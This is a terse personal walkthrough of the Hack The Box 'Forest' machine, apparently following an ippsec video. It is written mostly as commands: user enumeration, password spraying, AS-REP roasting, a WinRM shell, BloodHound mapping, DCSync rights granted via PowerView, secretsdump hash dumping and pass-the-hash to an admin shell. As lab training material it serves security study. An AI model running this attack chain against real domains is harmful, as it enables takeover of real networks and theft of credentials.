Forest HTB (ippsec) -followthrough
try to expose SMB
try to expose host names with nslookup
127.0.0.1
the actual ip
ldapsearch IP -x -s base namingcontexts (find domain info)
ldapsearch IP -x -s -b "DC=htb,DC=local" '(objectClass=Person)' FILTERS(what you want to see)
for the filter part you can put whatever like sAMAccountName
we can do user instead of the person, too
we can do passwordspray once we get the account names.
awk '{print $2}' to print the second part.
make a user list with the valid users (no need to include guest account that ends with $ -- valid users are generally short)
Let's crack them with password!
password list should be short.
Months,Spring, Summer, Winter, Autmn, Fall, Password, Password123, P@ssw0rd, Secret
for i in $(cat pwlist.txt); do echo $i; echo ${i}2019; echo ${i}2020; done
this adds year at the end of each word.
hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rules
This will mutate the passwords and create a new passwordlist
add a ! at the end of each word
for i in $(cat pwlist.txt); do echo $i; echo ${i}\!; done
Another technique
hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rules -r /usr/share/hashcat/rules/toggles1.rule | sort -u
this capitalize different letters | awk 'length ($0) > 8'
Dump password policy
crackmapexec smb IP --pass-pol
crackmapesex smb IP --pass-pol -u '' -p '' (null authentication attempt)
enum4linux
Manual way to look up password policy
if it's showing something like below, it's doing rpc
do rpcclient -U '' IP
and login:
enumdom
enumdomusers
queryusergroups 0x47b (rid)
querygroup grouprid to see what kind of domain it is
queryuser rid to see password policies
Crack pass
crackmapexec smb IP -u userlist.out -p pwlist.out
----
Impacket GetNPUsers -dc-ip IP -request 'htb.local/' -format hashcat
looks for account that doesn't require kerbero authentication and dump the hashes.
and crack the output
-----
crackmapexec smb IP -u svc-alfresco -p s3rvice --shares
shows shares
---
Use evill-winrm
./evil-winrm.rb -u user -p pass -i IP
---> this should get you to the service level shell
---
Priv Esc
bloodhound
On Kali:
download the zip file and the bloodhound application file separately.
After downloading, unzip the application file.
Download neo4j
neo4j console -> set a new password (default is neo4j) by visiting the localhost:PORT
Now execute the Bloodhound with ./Bloodhound --no-sandbox and logiin
On the victim's machine, upload or use the mounted drive to run the SharpHound.exe
./SharpHound.exe -c all
On kali,
drop the bloodhound zip file onto the browser which should start processing
On the search bar, type in the user that you already know and mark it as owned
-> show paths from owned principles -> shows a map
If you see an account operation group, they can create users
On victim's,
net user gori gorigori(pass) /add /domain
this should create an account.
net group "Exchange Windows Permissions" /add gori
net group "Exchange Windows Permissions" will verify that the user has been added.
On bloodhound, click the link "WriteDacl" > Abuseinfo
Add-DomainObjectAcl -Credentials $cred -TargetIdentity testlab.local -Rights DCSync
This is a powerview command .
Download the dev version of the powersploit with the -b dev on git clone
copy the powerview.ps1 over to the victim's machine.
$pass= convertto-securestring 'gorigori' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('HTBl\gori', $pass)
Add-DomainObjectAcl -Credentials $cred -TargetIdentity "DC=htb, DC=local" -PrincipalIdentity gori -Rights DCSync
Then on kali,
use impacket's secretsdump.py htb/gori:gorigori@IP
grab the last :HASH: part for the admin account
Crack the pass
crackmapexec smb IP -u administrator -H HASH
psexec.py htb.local/Administrator:Pass@10.129.138.20
This should get you a root shell.
---
Another way to crack
NTLM password cracking:
and do
--user will recognize the format "user:hash"
--show will show users
----
Golden Ticket method
copy the krbtgt hash.
On the victim's machine, run the following command to get the -domain-sid
#username can be anything.
ipaddress address should not be used for the remote_hostname. Always add the host name to the hosts file.
if it says the time is wrong, we have to change our time --- nmap shows clockstew.
date -s TIME
to change time
Last updated